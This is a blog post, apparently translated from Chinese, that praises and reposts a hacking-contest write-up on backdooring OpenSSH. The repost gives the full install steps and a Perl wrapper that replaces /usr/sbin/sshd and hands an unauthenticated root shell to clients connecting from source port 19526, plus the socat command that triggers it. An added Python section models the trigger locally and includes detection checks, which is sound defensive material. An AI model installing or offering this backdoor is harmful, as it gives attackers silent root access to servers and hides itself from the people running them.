A clever sshd backdoor

@沈沉舟 posted a very interesting sshd backdoor; the original is at http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/. After reading it, I found it so ingenious it is almost indecent.

What init starts first is /usr/sbin/sshd, which is now the attacker's Perl script. When execution reaches getpeername, STDIN is not a socket, so the regex match fails and the next statement runs, starting /usr/bin/sshd, the original daemon. Once the original sshd, listening on its port, has accepted a TCP connection, it forks a child process to handle that client. The child does no checking of its own; it simply re-executes sshd from the usual location, /usr/sbin/sshd (the wrapper deliberately passes that path as argv[0], and sshd re-executes the absolute path it was started with), so control returns to the Perl script. By now the child's standard input and output have been redirected to the socket, so getpeername really does return the client's address, and if the client's TCP source port is 19526 the script execs sh and hands over a shell. As for where 19526 comes from, the author says it is "the string "LF" converted from ASCII to a big-endian 16 bit integer"; the value can of course be changed.
Light, deft and ingenious; a marvel to behold. The original post follows:

[Hacking-Contest] SSH Server wrapper

Posted on 

This blogpost shows how the SSH server can be replaced with a small wrapper script to allow full unauthenticated remote root access without disturbing the normal operation of the service. In order to install the wrapper script, the original SSH server must be renamed or moved to another directory. I have chosen to just move the binary from /usr/sbin/ to /usr/bin/:

cd /usr/sbin
mv sshd ../bin
vi sshd

Then type in the following small wrapper script:

#!/usr/bin/perl
# Backdoor trigger: when STDIN is a socket, getpeername returns the packed sockaddr_in; bytes 3-4 are the big-endian source port, so /^..LF/ matches port 0x4C46 = 19526 and the client gets a shell.
exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);
# Otherwise run the real binary with argv[0] set to /usr/sbin/sshd, so sshd's per-connection re-exec of its own path lands back in this wrapper.
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

Finally the wrapper script must be made executable e.g. with the following command:

chmod 755 sshd

In the normal operation of the ssh server, the wrapper script just executes the original sshd binary (which has been moved to /usr/bin/sshd) with all the given command-line arguments. If STDIN is a socket and the source port of the connected client happens to be 19526 (the string “LF” converted from ASCII to a big-endian 16 bit integer), the wrapper however executes /bin/sh instead, which gives the client an unauthenticated remote root shell.

Like many other network services, the OpenSSH server forks a new child process when receiving a new TCP connection. However, contrary to most other services, it doesn’t directly serve the client in the child process after the fork. Instead it re-executes its own binary (typically /usr/sbin/sshd) in the child process so that the client is handled by a new instance of the sshd process (which makes ASLR more effective by giving each child process a different randomized memory layout). For this child process, the file descriptors STDIN/STDOUT are connected to the client socket.

In order to exploit the backdoor to get a remote root shell, you have to connect to the SSH service from source port 19526, which can easily be achieved with the following command:

socat STDIO TCP4:target_ip:22,sourceport=19526
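As an added example (not code from the post above, nor from OpenSSH), the following Python models the wrapper's trigger so the "LF" = 19526 trick can be checked without installing anything: it lays out a struct sockaddr_in the way Perl's getpeername returns it, applies the same /^..LF/ match, reproduces the socat step against a throwaway local listener, and adds the check a defender would run, namely whether the sshd that init starts is an ELF binary or a script. The path /usr/sbin/sshd is taken from the post; nothing here touches a real SSH server.

```python
import os
import re
import socket
import struct
import threading
from typing import Optional

# Added example modelling the wrapper from the post; not the post's own code.
TRIGGER_PORT = int.from_bytes(b"LF", "big")  # 0x4C46 == 19526
TRIGGER_RE = re.compile(rb"^..LF")            # the Perl wrapper's /^..LF/


def packed_sockaddr_in(ip: str, port: int) -> bytes:
    """Lay out a struct sockaddr_in as Perl's getpeername() hands it back:
    2 bytes sa_family in host order, 2 bytes sin_port in network (big-endian)
    order, 4 bytes sin_addr, then 8 bytes of zero padding (16 bytes in all)."""
    return (struct.pack("=H", socket.AF_INET)
            + struct.pack("!H", port)
            + socket.inet_aton(ip)
            + b"\x00" * 8)


def peer_port(sockaddr: bytes) -> int:
    """Decode sin_port from a packed sockaddr_in (the bytes the regex compares)."""
    return struct.unpack("!H", sockaddr[2:4])[0]


def wrapper_spawns_shell(sockaddr: Optional[bytes]) -> bool:
    """The wrapper's test: getpeername(STDIN) =~ /^..LF/.  When STDIN is not a
    socket (the initial start by init) getpeername yields nothing, the match
    fails, and the real sshd is executed instead."""
    return sockaddr is not None and TRIGGER_RE.match(sockaddr) is not None


def kind_of_head(head: bytes) -> str:
    """Classify a file by its first bytes: the genuine OpenSSH daemon is an ELF
    binary, while the wrapper in the post is a '#!/usr/bin/perl' script."""
    if head.startswith(b"\x7fELF"):
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "unknown"


def sshd_path_kind(path: str) -> str:
    """Defender's check: what does the sshd that init starts actually contain?"""
    with open(path, "rb") as f:
        return kind_of_head(f.read(4))


def probe_localhost(source_port: int) -> bool:
    """Connect to a throwaway local listener from a chosen source port (what the
    socat command does against port 22) and report whether the peer address the
    listener sees would make the wrapper exec /bin/sh."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    seen = {}

    def accept_once():
        conn, _ = srv.accept()
        ip, port = conn.getpeername()
        seen["hit"] = wrapper_spawns_shell(packed_sockaddr_in(ip, port))
        conn.close()

    t = threading.Thread(target=accept_once)
    t.start()
    cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    cli.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    cli.bind(("127.0.0.1", source_port))  # choose our source port, like sourceport=
    cli.connect(srv.getsockname())
    t.join()
    cli.close()
    srv.close()
    return seen["hit"]


if __name__ == "__main__":
    print("trigger port:", TRIGGER_PORT)
    print("peer from 19526 -> shell:", probe_localhost(TRIGGER_PORT))
    print("peer from 40000 -> sshd :", probe_localhost(40000))
    path = "/usr/sbin/sshd"  # path from the post; checked only if present
    print(path, "is:", sshd_path_kind(path) if os.path.exists(path) else "absent")
```

On a clean host sshd_path_kind("/usr/sbin/sshd") returns "elf"; a "script" answer means something is sitting in front of the real daemon, and package verification (dpkg -V or rpm -V for the openssh-server package) will likewise flag the replaced file.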
This entry was posted in the 技术 (Technology) category.

4 comments on "A clever sshd backdoor"

  1. zuhd says:

    I still feel the old site had more character; everything is WordPress now, and I've lost my way...
